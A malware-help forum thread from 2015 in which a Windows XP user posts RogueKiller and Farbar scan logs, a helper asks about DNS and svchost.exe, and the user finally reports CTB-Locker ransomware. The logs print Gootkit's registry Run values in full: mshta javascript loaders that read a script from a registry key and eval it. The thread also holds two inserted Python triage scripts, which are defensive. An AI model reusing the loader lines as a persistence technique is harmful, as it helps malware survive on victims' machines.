  • 21 posts

Posted 27 June 2015 - 12:48 PM

Ran RogueKiller and after a reboot the computer is almost 100% non-responsive at this time.

After booting into safe mode I found 14 RogueKiller logs (took 3 hours for Windows search to find them).

I will post the earliest one that I could find.

 

RogueKiller V10.8.6.0 [Jun 22 2015] by Adlice Software
 
Operating System : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Started in : Normal mode
User : Daniel [Administrator]
Started from : H:\Documents and Settings\Daniel\Desktop\RogueKiller.exe
Mode : Scan -- Date : 06/27/2015  09:28:48
 
¤¤¤ Processes : 3 ¤¤¤
[Proc.Injected|Proc.RunPE] svchost.exe(2596) -- H:\WINDOWS\system32\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe(2596) -- H:\WINDOWS\system32\svchost.exe[7] -> Killed [TermProc]
[Suspicious.Path|VT.Unknown] explorer.exe(448) -- H:\Documents and Settings\All Users\Application Data\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}\vfnws.dll[-] -> Unloaded
 
¤¤¤ Registry : 12 ¤¤¤
[Suspicious.Path] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 90bdf87f : "h:\documents and settings\daniel\local settings\application data\dudev\dudev.exe" [x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:ljg1Om3TR="8NnSapX";m59i=new%20ActiveXObject("WScript.Shell");ZEgfqz7v="FMQM";zVK8P=m59i.RegRead("HKLM\\software\\43aefa25\\db9fc761");GoNPix3="0oo0";eval(zVK8P);Rh9aimY="yO"; [x][x] -> Found
[Suspicious.Path] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run | 90bdf87f : "h:\documents and settings\daniel\local settings\application data\dudev\dudev.exe" [x] -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:RKRdDgi9e="iW";z56Y=new%20ActiveXObject("WScript.Shell");vUcSm6ZjV="RqQbASQec";N5s8cK=z56Y.RegRead("HKCU\\software\\43aefa25\\db9fc761");bDMC2I3sI="U";eval(N5s8cK);KfS4yc6EAt="W6"; [x][x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | 7e95a134 : mshta javascript:LBdNum2="9Dr";D6X2=new%20ActiveXObject("WScript.Shell");lwUW7mak3p="EpXHSolfBO";Dy8Kk9=D6X2.RegRead("HKLM\\software\\43aefa25\\db9fc761");RilNxHma7="qubO";eval(Dy8Kk9);cbu7pCxz="DzuH"; [x][x] -> Found
[PUM.HomePage] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cnn.com/  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 1 ¤¤¤
[H:\WINDOWS\system32\drivers\etc\hosts] 127.0.0.1       localhost
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] fq27hxil.default : user_pref("browser.startup.homepage", "http://www.cnn.com/"); -> Found
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD50 00AAKS-00Z7B SCSI Disk Device +++++
--- User ---
[MBR] 2ea7add702617c5d216234bebd8acd6e
[BSP] b69845ec91a0703232e871c52bad2105 : Windows XP|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 476929 MB [Windows XP Bootstrap | Windows XP Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )
 
+++++ PhysicalDrive1: Generic USB SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive2: Generic USB CF Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive3: Generic USB SM Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive4: Generic USB MS Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
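
The Registry section of the RogueKiller report above is worth reading as a defender rather than just pasting into a fix: the three [Tr.Gootkit] Run values are only bootstraps that use mshta to read and eval a script stored under a separate registry key, so deleting the Run value alone leaves the payload in place. The following Python triage is an added example (not part of the thread and not RogueKiller code) that parses report lines in that format, extracts the key each loader reads from, flags Run entries launched from the user profile, and compares DhcpNameServer values against the servers you expect; the sample lines are constructed in the report's shape with the script values shortened, and the 192.168.1.1 allowlist is a placeholder.

```python
import re

# Constructed sample in the shape of the "Registry" section of the RogueKiller
# report above. The scripted Run values are shortened to the parts that matter
# (mshta + javascript: + RegRead + eval); the key names are those in the report.
SAMPLE_REGISTRY_SECTION = r"""
[Suspicious.Path] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 90bdf87f : "h:\documents and settings\daniel\local settings\application data\dudev\dudev.exe" [x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:a="1";s=new%20ActiveXObject("WScript.Shell");v=s.RegRead("HKLM\\software\\43aefa25\\db9fc761");eval(v); [x][x] -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:b="2";s=new%20ActiveXObject("WScript.Shell");v=s.RegRead("HKCU\\software\\43aefa25\\db9fc761");eval(v); [x][x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | 7e95a134 : mshta javascript:c="3";s=new%20ActiveXObject("WScript.Shell");v=s.RegRead("HKLM\\software\\43aefa25\\db9fc761");eval(v); [x][x] -> Found
[PUM.HomePage] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cnn.com/  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
"""

# One report line: [Tag] KEY | ValueName : value [x]... -> Status
LINE_RE = re.compile(
    r'^\[(?P<tag>[^\]]+)\]\s+(?P<key>\S+)\s+\|\s+(?P<name>.+?)\s+:\s+'
    r'(?P<value>.*?)(?:\s*\[[xX]\])*\s*->\s*(?P<status>\w+)\s*$')

# The registry path passed to WScript.Shell.RegRead("...") inside the loader.
REGREAD_RE = re.compile(r'RegRead\("((?:[^"\\]|\\.)*)"\)')


def triage(report, expected_dns=()):
    """Return a list of findings from the Registry section of a RogueKiller report."""
    findings = []
    for raw in report.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        entry = m.groupdict()
        key, name, value = entry['key'], entry['name'], entry['value']
        if re.search(r'\bmshta\b.*javascript:', value, re.I) and 'eval(' in value:
            # Registry-resident loader: the Run value only bootstraps; the script
            # it executes lives in the key named inside RegRead(). JS string
            # escaping doubles the backslashes, so undo that for the real path.
            refs = [r.replace('\\\\', '\\') for r in REGREAD_RE.findall(value)]
            findings.append({'kind': 'registry_resident_loader', 'key': key,
                             'name': name, 'payload_keys': refs})
        elif name == 'DhcpNameServer':
            # Resolver handed out by DHCP; anything outside the allowlist needs
            # an explanation (the thread's helper asked exactly that question).
            unexpected = [ip for ip in value.split() if ip not in expected_dns]
            if unexpected:
                findings.append({'kind': 'unexpected_dns', 'key': key,
                                 'servers': unexpected})
        elif key.lower().endswith('\\run') and 'application data' in value.lower():
            # Autostart launched from a writable user-profile location.
            findings.append({'kind': 'run_from_user_profile', 'key': key,
                             'name': name, 'command': value})
    return findings


def payload_keys(findings):
    """Distinct registry keys the loaders read their script from (remove these too)."""
    return sorted({k for f in findings
                   if f['kind'] == 'registry_resident_loader'
                   for k in f['payload_keys']})


if __name__ == '__main__':
    # 192.168.1.1 is a placeholder for the resolver the LAN is expected to use.
    found = triage(SAMPLE_REGISTRY_SECTION, expected_dns=('192.168.1.1',))
    for f in found:
        print(f)
    print('also remove:', payload_keys(found))
```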


#13 nasdaq

  • Malware Response Team
  • 38,242 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 27 June 2015 - 01:24 PM


If you have to restore your computer, there was one point set on June 23 when you ran the Zoek tool.

Restore point was successfully created.
===

This is the IP that you are currently using. Can you relate to it?
http://whatismyipaddress.com/ip/64.233.217.2

===

H:\WINDOWS\system32\svchost.exe
That svchost.exe file may be corrupted.

Please run the Farbar tool and search for it as you did the others.

Just enter svchost.exe in the text box.

===

#14 danielzink
  • Topic Starter
  • Members
  • 21 posts

Posted 27 June 2015 - 06:06 PM

Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-27 18:58:56
Running from E:\AV\frst
Boot Mode: Normal
 
================== Search Files: "svchost.exe" =============
 
H:\WINDOWS\system32\svchost.exe
[2004-08-04 00:56][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\svchost.exe
[2008-04-13 20:12][2008-04-13 20:12] 0014336 _____ (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\WINDOWS\ERDNT\cache\svchost.exe
[2011-07-15 07:13][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\Program Files\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2015-06-18 00:58][2015-04-14 09:36] 0878392 ____A (MalwareBytes) 4518dd9a09b4fef7db3b13f0ddddd36e      [File is signed]
 
====== End of Search ======
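
The point of the svchost.exe search requested in the previous reply is the comparison the Search.txt makes possible: every Microsoft copy of the file should carry the same MD5 and size as the untouched copy FRST finds under ServicePackFiles\i386, and should be signed. The Python check below is an added example (not from the thread and not FRST code) that parses output in this Search.txt format and produces that verdict per copy, treating the ServicePackFiles copy as the reference (an assumption) and setting aside copies from another publisher such as the Malwarebytes Chameleon one; the dllcache entry in the sample is constructed to show what a tampered copy would look like, and its hash is a placeholder.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample in the format of the FRST Search.txt above. The first four
# entries are the ones reported in the thread; the dllcache entry is invented
# to show what a tampered copy would look like (its hash is a placeholder).
SAMPLE_SEARCH = r"""
================== Search Files: "svchost.exe" =============

H:\WINDOWS\system32\svchost.exe
[2004-08-04 00:56][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]

H:\WINDOWS\ServicePackFiles\i386\svchost.exe
[2008-04-13 20:12][2008-04-13 20:12] 0014336 _____ (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]

H:\WINDOWS\ERDNT\cache\svchost.exe
[2011-07-15 07:13][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]

H:\Program Files\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2015-06-18 00:58][2015-04-14 09:36] 0878392 ____A (MalwareBytes) 4518dd9a09b4fef7db3b13f0ddddd36e      [File is signed]

H:\WINDOWS\system32\dllcache\svchost.exe
[2015-06-20 03:11][2015-06-20 03:11] 0014336 ____A (Microsoft Corporation) 00000000000000000000000000000000      [File not signed]

====== End of Search ======
"""

# Detail line: [created][modified] size attrs (company) md5 [signature note]
DETAIL_RE = re.compile(
    r'^\[(?P<created>[^\]]+)\]\[(?P<modified>[^\]]+)\]\s+(?P<size>\d+)\s+(?P<attrs>\S+)\s+'
    r'\((?P<company>[^)]*)\)\s+(?P<md5>[0-9a-fA-F]{32})\s+\[(?P<sig>[^\]]+)\]\s*$')

# Assumption: the Service Pack originals kept here are the pristine copies.
REFERENCE_DIR = '\\servicepackfiles\\i386\\'


def parse_search(text):
    """Pair each path line with the detail line FRST prints under it."""
    lines = [line.strip() for line in text.splitlines()]
    entries = []
    for path, detail in zip(lines, lines[1:]):
        m = DETAIL_RE.match(detail)
        if m and path and not path.startswith('='):
            e = m.groupdict()
            e.update(path=path, size=int(e['size']), md5=e['md5'].lower())
            entries.append(e)
    return entries


def compare_to_reference(text):
    """Verdict for every non-reference copy of each searched file name."""
    by_name = defaultdict(list)
    for e in parse_search(text):
        by_name[PureWindowsPath(e['path']).name.lower()].append(e)
    verdicts = {}
    for entries in by_name.values():
        ref = next((e for e in entries if REFERENCE_DIR in e['path'].lower()), None)
        for e in entries:
            if e is ref:
                continue
            if ref is None:
                verdicts[e['path']] = 'no reference copy to compare against'
            elif 'microsoft' not in e['company'].lower():
                # Another product shipping a file with the same name is not a
                # tampered Windows binary (Malwarebytes Chameleon here).
                verdicts[e['path']] = 'other publisher (%s)' % e['company']
            else:
                reasons = []
                if e['md5'] != ref['md5']:
                    reasons.append('md5 differs')
                if e['size'] != ref['size']:
                    reasons.append('size differs')
                if e['sig'] != 'File is signed':
                    reasons.append(e['sig'].lower())
                verdicts[e['path']] = ('MISMATCH: ' + ', '.join(reasons)
                                       if reasons else 'matches reference')
    return verdicts


def suspicious(text):
    """Paths whose Microsoft copy does not match the reference copy."""
    return sorted(p for p, v in compare_to_reference(text).items()
                  if v.startswith('MISMATCH'))


if __name__ == '__main__':
    for path, verdict in compare_to_reference(SAMPLE_SEARCH).items():
        print('%-75s %s' % (path, verdict))
```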


#15 danielzink
  • Topic Starter
  • Members
  • 21 posts

Posted 27 June 2015 - 09:17 PM

I disconnected my external hard drives.

Connected one to my laptop that I've been doing all this posting on.

I noticed all files on the external hard drive had a "strange" extension.

I found an unencrypted jpg and it reads "your files are encrypted by CTB-Locker".

Super....





